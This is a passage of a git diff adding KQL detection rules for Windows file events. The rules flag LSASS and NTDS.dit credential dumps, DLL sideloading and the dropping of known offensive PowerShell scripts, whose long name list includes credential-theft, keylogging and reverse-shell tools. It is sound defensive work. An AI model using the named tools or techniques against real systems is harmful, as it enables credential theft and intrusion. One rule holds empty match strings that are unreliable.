+| where (InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\msaccess.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\eqnedt32.exe" or InitiatingProcessFolderPath endswith "\\visio.exe" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\certoc.exe" or InitiatingProcessFolderPath endswith "\\CertReq.exe" or InitiatingProcessFolderPath endswith "\\Desktopimgdownldr.exe" or InitiatingProcessFolderPath endswith "\\esentutl.exe" or InitiatingProcessFolderPath endswith "\\finger.exe" or InitiatingProcessFolderPath endswith "\\notepad.exe" or InitiatingProcessFolderPath endswith "\\AcroRd32.exe" or InitiatingProcessFolderPath endswith "\\RdrCEF.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\hh.exe") and (FolderPath endswith ".zip" or FolderPath endswith ".rar" or FolderPath endswith ".7z" or FolderPath endswith ".diagcab" or FolderPath endswith ".appx")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/legitimate_application_dropped_executable.kql b/KQL/rules/windows/file/file_event/legitimate_application_dropped_executable.kql
new file mode 100644
index 00000000..6f51b276
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/legitimate_application_dropped_executable.kql
@@ -0,0 +1,10 @@
+// Title: Legitimate Application Dropped Executable
+// Author: frack113, Florian Roth (Nextron Systems)
+// Date: 2022-08-21
+// Level: high
+// Description: Detects programs on a Windows system that should not write executables to disk
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\eqnedt32.exe" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\certoc.exe" or InitiatingProcessFolderPath endswith "\\CertReq.exe" or InitiatingProcessFolderPath endswith "\\Desktopimgdownldr.exe" or InitiatingProcessFolderPath endswith "\\esentutl.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\AcroRd32.exe" or InitiatingProcessFolderPath endswith "\\RdrCEF.exe" or InitiatingProcessFolderPath endswith "\\hh.exe" or InitiatingProcessFolderPath endswith "\\finger.exe") and (FolderPath endswith ".exe" or FolderPath endswith ".dll" or FolderPath endswith ".ocx")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/legitimate_application_dropped_script.kql b/KQL/rules/windows/file/file_event/legitimate_application_dropped_script.kql
new file mode 100644
index 00000000..3403e948
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/legitimate_application_dropped_script.kql
@@ -0,0 +1,10 @@
+// Title: Legitimate Application Dropped Script
+// Author: frack113, Florian Roth (Nextron Systems)
+// Date: 2022-08-21
+// Level: high
+// Description: Detects programs on a Windows system that should not write scripts to disk
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\eqnedt32.exe" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\certoc.exe" or InitiatingProcessFolderPath endswith "\\CertReq.exe" or InitiatingProcessFolderPath endswith "\\Desktopimgdownldr.exe" or InitiatingProcessFolderPath endswith "\\esentutl.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\AcroRd32.exe" or InitiatingProcessFolderPath endswith "\\RdrCEF.exe" or InitiatingProcessFolderPath endswith "\\hh.exe" or InitiatingProcessFolderPath endswith "\\finger.exe") and (FolderPath endswith ".ps1" or FolderPath endswith ".bat" or FolderPath endswith ".vbs" or FolderPath endswith ".scf" or FolderPath endswith ".wsf" or FolderPath endswith ".wsh")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/livekd_driver_creation.kql b/KQL/rules/windows/file/file_event/livekd_driver_creation.kql
new file mode 100644
index 00000000..50f9001f
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/livekd_driver_creation.kql
@@ -0,0 +1,12 @@
+// Title: LiveKD Driver Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-16
+// Level: medium
+// Description: Detects the creation of the LiveKD driver, which is used for live kernel debugging
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation
+// False Positives:
+//   - Legitimate usage of LiveKD for debugging purposes will also trigger this
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livek64.exe") and FolderPath =~ "C:\\Windows\\System32\\drivers\\LiveKdD.SYS"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/livekd_driver_creation_by_uncommon_process.kql b/KQL/rules/windows/file/file_event/livekd_driver_creation_by_uncommon_process.kql
new file mode 100644
index 00000000..0444f8ca
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/livekd_driver_creation_by_uncommon_process.kql
@@ -0,0 +1,12 @@
+// Title: LiveKD Driver Creation By Uncommon Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-16
+// Level: high
+// Description: Detects the creation of the LiveKD driver by a process image other than "livekd.exe".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation
+// False Positives:
+//   - Administrators might rename LiveKD before its usage which could trigger this. Add additional names you use to the filter
+
+DeviceFileEvents
+| where FolderPath =~ "C:\\Windows\\System32\\drivers\\LiveKdD.SYS" and (not((InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livek64.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/livekd_kernel_memory_dump_file_created.kql b/KQL/rules/windows/file/file_event/livekd_kernel_memory_dump_file_created.kql
new file mode 100644
index 00000000..e06764b1
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/livekd_kernel_memory_dump_file_created.kql
@@ -0,0 +1,12 @@
+// Title: LiveKD Kernel Memory Dump File Created
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-16
+// Level: high
+// Description: Detects the creation of a file that has the same name as the default LiveKD kernel memory dump.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation
+// False Positives:
+//   - In rare occasions administrators might leverage LiveKD to perform live kernel debugging. This should not be allowed on production systems. Investigate and apply additional filters where necessary.
+
+DeviceFileEvents
+| where FolderPath =~ "C:\\Windows\\livekd.dmp"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/lsass_process_dump_artefact_in_crashdumps_folder.kql b/KQL/rules/windows/file/file_event/lsass_process_dump_artefact_in_crashdumps_folder.kql
new file mode 100644
index 00000000..468deece
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/lsass_process_dump_artefact_in_crashdumps_folder.kql
@@ -0,0 +1,12 @@
+// Title: LSASS Process Dump Artefact In CrashDumps Folder
+// Author: @pbssubhash
+// Date: 2022-12-08
+// Level: high
+// Description: Detects the presence of an LSASS dump file in the "CrashDumps" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+//   - Rare legitimate dump of the process by the operating system due to a crash of lsass
+
+DeviceFileEvents
+| where FolderPath contains "lsass.exe." and FolderPath endswith ".dmp" and FolderPath startswith "C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\CrashDumps\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/lsass_process_memory_dump_creation_via_taskmgr_exe.kql b/KQL/rules/windows/file/file_event/lsass_process_memory_dump_creation_via_taskmgr_exe.kql
new file mode 100644
index 00000000..8c2cf94b
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/lsass_process_memory_dump_creation_via_taskmgr_exe.kql
@@ -0,0 +1,12 @@
+// Title: LSASS Process Memory Dump Creation Via Taskmgr.EXE
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2023-10-19
+// Level: high
+// Description: Detects the creation of an "lsass.dmp" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+//   - Rare case of troubleshooting by an administrator or support that has to be investigated regardless
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith ":\\Windows\\system32\\taskmgr.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\taskmgr.exe") and (FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath contains "\\lsass" and FolderPath contains ".DMP")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/lsass_process_memory_dump_files.kql b/KQL/rules/windows/file/file_event/lsass_process_memory_dump_files.kql
new file mode 100644
index 00000000..04e5d0d0
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/lsass_process_memory_dump_files.kql
@@ -0,0 +1,10 @@
+// Title: LSASS Process Memory Dump Files
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-11-15
+// Level: high
+// Description: Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+
+DeviceFileEvents
+| where (FolderPath endswith "\\Andrew.dmp" or FolderPath endswith "\\Coredump.dmp" or FolderPath endswith "\\lsass.dmp" or FolderPath endswith "\\lsass.rar" or FolderPath endswith "\\lsass.zip" or FolderPath endswith "\\NotLSASS.zip" or FolderPath endswith "\\PPLBlade.dmp" or FolderPath endswith "\\rustive.dmp") or (FolderPath contains "\\lsass_2" or FolderPath contains "\\lsassdmp" or FolderPath contains "\\lsassdump") or (FolderPath contains "\\lsass" and FolderPath contains ".dmp") or (FolderPath contains "SQLDmpr" and FolderPath endswith ".mdmp") or ((FolderPath contains "\\nanodump" or FolderPath contains "\\proc_") and FolderPath endswith ".dmp")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql b/KQL/rules/windows/file/file_event/malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql
new file mode 100644
index 00000000..1072f8df
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql
@@ -0,0 +1,11 @@
+// Title: Malicious DLL File Dropped in the Teams or OneDrive Folder
+// Author: frack113
+// Date: 2022-08-12
+// Level: high
+// Description: Detects creation of a malicious DLL file in the location where the OneDrive or Team applications
+// Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.001
+
+DeviceFileEvents
+| where FolderPath contains "iphlpapi.dll" and FolderPath contains "\\AppData\\Local\\Microsoft"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/malicious_powershell_scripts_filecreation.kql b/KQL/rules/windows/file/file_event/malicious_powershell_scripts_filecreation.kql
new file mode 100644
index 00000000..4b9046be
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/malicious_powershell_scripts_filecreation.kql
@@ -0,0 +1,10 @@
+// Title: Malicious PowerShell Scripts - FileCreation
+// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein
+// Date: 2018-04-07
+// Level: high
+// Description: Detects the creation of known offensive powershell scripts used for exploitation
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceFileEvents
+| where (FolderPath endswith "\\Add-ConstrainedDelegationBackdoor.ps1" or FolderPath endswith "\\Add-Exfiltration.ps1" or FolderPath endswith "\\Add-Persistence.ps1" or FolderPath endswith "\\Add-RegBackdoor.ps1" or FolderPath endswith "\\Add-RemoteRegBackdoor.ps1" or FolderPath endswith "\\Add-ScrnSaveBackdoor.ps1" or FolderPath endswith "\\ADRecon.ps1" or FolderPath endswith "\\AzureADRecon.ps1" or FolderPath endswith "\\BadSuccessor.ps1" or FolderPath endswith "\\Check-VM.ps1" or FolderPath endswith "\\ConvertTo-ROT13.ps1" or FolderPath endswith "\\Copy-VSS.ps1" or FolderPath endswith "\\Create-MultipleSessions.ps1" or FolderPath endswith "\\DNS_TXT_Pwnage.ps1" or FolderPath endswith "\\dnscat2.ps1" or FolderPath endswith "\\Do-Exfiltration.ps1" or FolderPath endswith "\\DomainPasswordSpray.ps1" or FolderPath endswith "\\Download_Execute.ps1" or FolderPath endswith "\\Download-Execute-PS.ps1" or FolderPath endswith "\\Enable-DuplicateToken.ps1" or FolderPath endswith "\\Enabled-DuplicateToken.ps1" or FolderPath endswith "\\Execute-Command-MSSQL.ps1" or FolderPath endswith "\\Execute-DNSTXT-Code.ps1" or FolderPath endswith "\\Execute-OnTime.ps1" or FolderPath endswith "\\ExetoText.ps1" or FolderPath endswith "\\Exploit-Jboss.ps1" or FolderPath endswith "\\Find-AVSignature.ps1" or FolderPath endswith "\\Find-Fruit.ps1" or FolderPath endswith "\\Find-GPOLocation.ps1" or FolderPath endswith "\\Find-TrustedDocuments.ps1" or FolderPath endswith "\\FireBuster.ps1" or FolderPath endswith "\\FireListener.ps1" or FolderPath endswith "\\Get-ApplicationHost.ps1" or FolderPath endswith "\\Get-ChromeDump.ps1" or FolderPath endswith "\\Get-ClipboardContents.ps1" or FolderPath endswith "\\Get-ComputerDetail.ps1" or FolderPath endswith "\\Get-FoxDump.ps1" or FolderPath endswith "\\Get-GPPAutologon.ps1" or FolderPath endswith "\\Get-GPPPassword.ps1" or FolderPath endswith "\\Get-IndexedItem.ps1" or FolderPath endswith "\\Get-Keystrokes.ps1" or FolderPath endswith "\\Get-LSASecret.ps1" or FolderPath endswith "\\Get-MicrophoneAudio.ps1" or FolderPath endswith "\\Get-PassHashes.ps1" or FolderPath endswith "\\Get-PassHints.ps1" or FolderPath endswith "\\Get-RegAlwaysInstallElevated.ps1" or FolderPath endswith "\\Get-RegAutoLogon.ps1" or FolderPath endswith "\\Get-RickAstley.ps1" or FolderPath endswith "\\Get-Screenshot.ps1" or FolderPath endswith "\\Get-SecurityPackages.ps1" or FolderPath endswith "\\Get-ServiceFilePermission.ps1" or FolderPath endswith "\\Get-ServicePermission.ps1" or FolderPath endswith "\\Get-ServiceUnquoted.ps1" or FolderPath endswith "\\Get-SiteListPassword.ps1" or FolderPath endswith "\\Get-System.ps1" or FolderPath endswith "\\Get-TimedScreenshot.ps1" or FolderPath endswith "\\Get-UnattendedInstallFile.ps1" or FolderPath endswith "\\Get-Unconstrained.ps1" or FolderPath endswith "\\Get-USBKeystrokes.ps1" or FolderPath endswith "\\Get-VaultCredential.ps1" or FolderPath endswith "\\Get-VulnAutoRun.ps1" or FolderPath endswith "\\Get-VulnSchTask.ps1" or FolderPath endswith "\\Get-WebConfig.ps1" or FolderPath endswith "\\Get-WebCredentials.ps1" or FolderPath endswith "\\Get-WLAN-Keys.ps1" or FolderPath endswith "\\Gupt-Backdoor.ps1" or FolderPath endswith "\\HTTP-Backdoor.ps1" or FolderPath endswith "\\HTTP-Login.ps1" or FolderPath endswith "\\Install-ServiceBinary.ps1" or FolderPath endswith "\\Install-SSP.ps1" or FolderPath endswith "\\Invoke-ACLScanner.ps1" or FolderPath endswith "\\Invoke-ADSBackdoor.ps1" or FolderPath endswith "\\Invoke-AmsiBypass.ps1" or FolderPath endswith "\\Invoke-ARPScan.ps1" or FolderPath endswith "\\Invoke-BackdoorLNK.ps1" or FolderPath endswith "\\Invoke-BadPotato.ps1" or FolderPath endswith "\\Invoke-BetterSafetyKatz.ps1" or FolderPath endswith "\\Invoke-BruteForce.ps1" or FolderPath endswith "\\Invoke-BypassUAC.ps1" or FolderPath endswith "\\Invoke-Carbuncle.ps1" or FolderPath endswith "\\Invoke-Certify.ps1" or FolderPath endswith "\\Invoke-ConPtyShell.ps1" or FolderPath endswith "\\Invoke-CredentialInjection.ps1" or FolderPath endswith "\\Invoke-CredentialsPhish.ps1" or FolderPath endswith "\\Invoke-DAFT.ps1" or FolderPath endswith "\\Invoke-DCSync.ps1" or FolderPath endswith "\\Invoke-Decode.ps1" or FolderPath endswith "\\Invoke-DinvokeKatz.ps1" or FolderPath endswith "\\Invoke-DllInjection.ps1" or FolderPath endswith "\\Invoke-DNSExfiltrator.ps1" or FolderPath endswith "\\Invoke-DNSUpdate.ps1" or FolderPath endswith "\\Invoke-DowngradeAccount.ps1" or FolderPath endswith "\\Invoke-EgressCheck.ps1" or FolderPath endswith "\\Invoke-Encode.ps1" or FolderPath endswith "\\Invoke-EventViewer.ps1" or FolderPath endswith "\\Invoke-Eyewitness.ps1" or FolderPath endswith "\\Invoke-FakeLogonScreen.ps1" or FolderPath endswith "\\Invoke-Farmer.ps1" or FolderPath endswith "\\Invoke-Get-RBCD-Threaded.ps1" or FolderPath endswith "\\Invoke-Gopher.ps1" or FolderPath endswith "\\Invoke-Grouper2.ps1" or FolderPath endswith "\\Invoke-Grouper3.ps1" or FolderPath endswith "\\Invoke-HandleKatz.ps1" or FolderPath endswith "\\Invoke-Interceptor.ps1" or FolderPath endswith "\\Invoke-Internalmonologue.ps1" or FolderPath endswith "\\Invoke-Inveigh.ps1" or FolderPath endswith "\\Invoke-InveighRelay.ps1" or FolderPath endswith "\\Invoke-JSRatRegsvr.ps1" or FolderPath endswith "\\Invoke-JSRatRundll.ps1" or FolderPath endswith "\\Invoke-KrbRelay.ps1" or FolderPath endswith "\\Invoke-KrbRelayUp.ps1" or FolderPath endswith "\\Invoke-LdapSignCheck.ps1" or FolderPath endswith "\\Invoke-Lockless.ps1" or FolderPath endswith "\\Invoke-MalSCCM.ps1" or FolderPath endswith "\\Invoke-Mimikatz.ps1" or FolderPath endswith "\\Invoke-MimikatzWDigestDowngrade.ps1" or FolderPath endswith "\\Invoke-Mimikittenz.ps1" or FolderPath endswith "\\Invoke-MITM6.ps1" or FolderPath endswith "\\Invoke-NanoDump.ps1" or FolderPath endswith "\\Invoke-NetRipper.ps1" or FolderPath endswith "\\Invoke-NetworkRelay.ps1" or FolderPath endswith "\\Invoke-NinjaCopy.ps1" or FolderPath endswith "\\Invoke-OxidResolver.ps1" or FolderPath endswith "\\Invoke-P0wnedshell.ps1" or FolderPath endswith "\\Invoke-P0wnedshellx86.ps1" or FolderPath endswith "\\Invoke-Paranoia.ps1" or FolderPath endswith "\\Invoke-PortScan.ps1" or FolderPath endswith "\\Invoke-PoshRatHttp.ps1" or FolderPath endswith "\\Invoke-PoshRatHttps.ps1" or FolderPath endswith "\\Invoke-PostExfil.ps1" or FolderPath endswith "\\Invoke-PowerDump.ps1" or FolderPath endswith "\\Invoke-PowerDPAPI.ps1" or FolderPath endswith "\\Invoke-PowerShellIcmp.ps1" or FolderPath endswith "\\Invoke-PowerShellTCP.ps1" or FolderPath endswith "\\Invoke-PowerShellTcpOneLine.ps1" or FolderPath endswith "\\Invoke-PowerShellTcpOneLineBind.ps1" or FolderPath endswith "\\Invoke-PowerShellUdp.ps1" or FolderPath endswith "\\Invoke-PowerShellUdpOneLine.ps1" or FolderPath endswith "\\Invoke-PowerShellWMI.ps1" or FolderPath endswith "\\Invoke-PowerThIEf.ps1" or FolderPath endswith "\\Invoke-PPLDump.ps1" or FolderPath endswith "\\Invoke-Prasadhak.ps1" or FolderPath endswith "\\Invoke-PsExec.ps1" or FolderPath endswith "\\Invoke-PsGcat.ps1" or FolderPath endswith "\\Invoke-PsGcatAgent.ps1" or FolderPath endswith "\\Invoke-PSInject.ps1" or FolderPath endswith "\\Invoke-PsUaCme.ps1" or FolderPath endswith "\\Invoke-ReflectivePEInjection.ps1" or FolderPath endswith "\\Invoke-ReverseDNSLookup.ps1" or FolderPath endswith "\\Invoke-Rubeus.ps1" or FolderPath endswith "\\Invoke-RunAs.ps1" or FolderPath endswith "\\Invoke-SafetyKatz.ps1" or FolderPath endswith "\\Invoke-SauronEye.ps1" or FolderPath endswith "\\Invoke-SCShell.ps1" or FolderPath endswith "\\Invoke-Seatbelt.ps1" or FolderPath endswith "\\Invoke-ServiceAbuse.ps1" or FolderPath endswith "\\Invoke-SessionGopher.ps1" or FolderPath endswith "\\Invoke-ShellCode.ps1" or FolderPath endswith "\\Invoke-SMBScanner.ps1" or FolderPath endswith "\\Invoke-Snaffler.ps1" or FolderPath endswith "\\Invoke-Spoolsample.ps1" or FolderPath endswith "\\Invoke-SSHCommand.ps1" or FolderPath endswith "\\Invoke-SSIDExfil.ps1" or FolderPath endswith "\\Invoke-StandIn.ps1" or FolderPath endswith "\\Invoke-StickyNotesExtract.ps1" or FolderPath endswith "\\Invoke-Tater.ps1" or FolderPath endswith "\\Invoke-Thunderfox.ps1" or FolderPath endswith "\\Invoke-ThunderStruck.ps1" or FolderPath endswith "\\Invoke-TokenManipulation.ps1" or FolderPath endswith "\\Invoke-Tokenvator.ps1" or FolderPath endswith "\\Invoke-TotalExec.ps1" or FolderPath endswith "\\Invoke-UrbanBishop.ps1" or FolderPath endswith "\\Invoke-UserHunter.ps1" or FolderPath endswith "\\Invoke-VoiceTroll.ps1" or FolderPath endswith "\\Invoke-Whisker.ps1" or FolderPath endswith "\\Invoke-WinEnum.ps1" or FolderPath endswith "\\Invoke-winPEAS.ps1" or FolderPath endswith "\\Invoke-WireTap.ps1" or FolderPath endswith "\\Invoke-WmiCommand.ps1" or FolderPath endswith "\\Invoke-WScriptBypassUAC.ps1" or FolderPath endswith "\\Invoke-Zerologon.ps1" or FolderPath endswith "\\Keylogger.ps1" or FolderPath endswith "\\MailRaider.ps1" or FolderPath endswith "\\New-HoneyHash.ps1" or FolderPath endswith "\\OfficeMemScraper.ps1" or FolderPath endswith "\\Offline_Winpwn.ps1" or FolderPath endswith "\\Out-CHM.ps1" or FolderPath endswith "\\Out-DnsTxt.ps1" or FolderPath endswith "\\Out-Excel.ps1" or FolderPath endswith "\\Out-HTA.ps1" or FolderPath endswith "\\Out-Java.ps1" or FolderPath endswith "\\Out-JS.ps1" or FolderPath endswith "\\Out-Minidump.ps1" or FolderPath endswith "\\Out-RundllCommand.ps1" or FolderPath endswith "\\Out-SCF.ps1" or FolderPath endswith "\\Out-SCT.ps1" or FolderPath endswith "\\Out-Shortcut.ps1" or FolderPath endswith "\\Out-WebQuery.ps1" or FolderPath endswith "\\Out-Word.ps1" or FolderPath endswith "\\Parse_Keys.ps1" or FolderPath endswith "\\Port-Scan.ps1" or FolderPath endswith "\\PowerBreach.ps1" or FolderPath endswith "\\powercat.ps1" or FolderPath endswith "\\Powermad.ps1" or FolderPath endswith "\\PowerRunAsSystem.psm1" or FolderPath endswith "\\PowerSharpPack.ps1" or FolderPath endswith "\\PowerUp.ps1" or FolderPath endswith "\\PowerUpSQL.ps1" or FolderPath endswith "\\PowerView.ps1" or FolderPath endswith "\\PSAsyncShell.ps1" or FolderPath endswith "\\RemoteHashRetrieval.ps1" or FolderPath endswith "\\Remove-Persistence.ps1" or FolderPath endswith "\\Remove-PoshRat.ps1" or FolderPath endswith "\\Remove-Update.ps1" or FolderPath endswith "\\Run-EXEonRemote.ps1" or FolderPath endswith "\\Schtasks-Backdoor.ps1" or FolderPath endswith "\\Set-DCShadowPermissions.ps1" or FolderPath endswith "\\Set-MacAttribute.ps1" or FolderPath endswith "\\Set-RemotePSRemoting.ps1" or FolderPath endswith "\\Set-RemoteWMI.ps1" or FolderPath endswith "\\Set-Wallpaper.ps1" or FolderPath endswith "\\Show-TargetScreen.ps1" or FolderPath endswith "\\Speak.ps1" or FolderPath endswith "\\Start-CaptureServer.ps1" or FolderPath endswith "\\Start-WebcamRecorder.ps1" or FolderPath endswith "\\StringToBase64.ps1" or FolderPath endswith "\\TexttoExe.ps1" or FolderPath endswith "\\Veeam-Get-Creds.ps1" or FolderPath endswith "\\VolumeShadowCopyTools.ps1" or FolderPath endswith "\\WinPwn.ps1" or FolderPath endswith "\\WSUSpendu.ps1") or (FolderPath contains "Invoke-Sharp" and FolderPath endswith ".ps1")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/new_custom_shim_database_created.kql b/KQL/rules/windows/file/file_event/new_custom_shim_database_created.kql
new file mode 100644
index 00000000..b6c4d886
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/new_custom_shim_database_created.kql
@@ -0,0 +1,13 @@
+// Title: New Custom Shim Database Created
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-12-29
+// Level: medium
+// Description: Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.
+// The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.009
+// False Positives:
+//   - Legitimate custom SHIM installations will also trigger this rule
+
+DeviceFileEvents
+| where FolderPath contains ":\\Windows\\apppatch\\Custom\\" or FolderPath contains ":\\Windows\\apppatch\\CustomSDB\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/new_outlook_macro_created.kql b/KQL/rules/windows/file/file_event/new_outlook_macro_created.kql
new file mode 100644
index 00000000..7c153c5a
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/new_outlook_macro_created.kql
@@ -0,0 +1,12 @@
+// Title: New Outlook Macro Created
+// Author: @ScoubiMtl
+// Date: 2021-04-05
+// Level: medium
+// Description: Detects the creation of a macro file for Outlook.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.command-and-control, attack.t1137, attack.t1008, attack.t1546
+// False Positives:
+//   - User genuinely creates a VB Macro for their email
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\outlook.exe" and FolderPath endswith "\\Microsoft\\Outlook\\VbaProject.OTM"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/ntds_dit_created.kql b/KQL/rules/windows/file/file_event/ntds_dit_created.kql
new file mode 100644
index 00000000..8340ad4a
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/ntds_dit_created.kql
@@ -0,0 +1,10 @@
+// Title: NTDS.DIT Created
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-05
+// Level: low
+// Description: Detects creation of a file named "ntds.dit" (Active Directory Database)
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.003
+
+DeviceFileEvents
+| where FolderPath endswith "ntds.dit"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/ntds_dit_creation_by_uncommon_parent_process.kql b/KQL/rules/windows/file/file_event/ntds_dit_creation_by_uncommon_parent_process.kql
new file mode 100644
index 00000000..4fe8fd8c
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/ntds_dit_creation_by_uncommon_parent_process.kql
@@ -0,0 +1,10 @@
+// Title: NTDS.DIT Creation By Uncommon Parent Process
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-11
+// Level: high
+// Description: Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon parent process or directory
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.003
+
+DeviceFileEvents
+| where FolderPath endswith "\\ntds.dit" and ((InitiatingProcessParentFileName in~ ("cscript.exe", "httpd.exe", "nginx.exe", "php-cgi.exe", "powershell.exe", "pwsh.exe", "w3wp.exe", "wscript.exe")) or (InitiatingProcessParentFileName startswith "apache" or InitiatingProcessParentFileName startswith "tomcat" or InitiatingProcessParentFileName startswith "" or InitiatingProcessParentFileName startswith "" or InitiatingProcessParentFileName startswith "" or InitiatingProcessParentFileName startswith ""))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/ntds_dit_creation_by_uncommon_process.kql b/KQL/rules/windows/file/file_event/ntds_dit_creation_by_uncommon_process.kql
new file mode 100644
index 00000000..af5c1e7b
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/ntds_dit_creation_by_uncommon_process.kql
@@ -0,0 +1,10 @@
+// Title: NTDS.DIT Creation By Uncommon Process
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-01-11
+// Level: high
+// Description: Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon process or a process located in a suspicious directory
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.002, attack.t1003.003
+
+DeviceFileEvents
+| where FolderPath endswith "\\ntds.dit" and ((InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\wsl.exe" or InitiatingProcessFolderPath endswith "\\wt.exe") or (InitiatingProcessFolderPath contains "\\AppData\\" or InitiatingProcessFolderPath contains "\\Temp\\" or InitiatingProcessFolderPath contains "\\Public\\" or InitiatingProcessFolderPath contains "\\PerfLogs\\"))
\ No newline at end of file
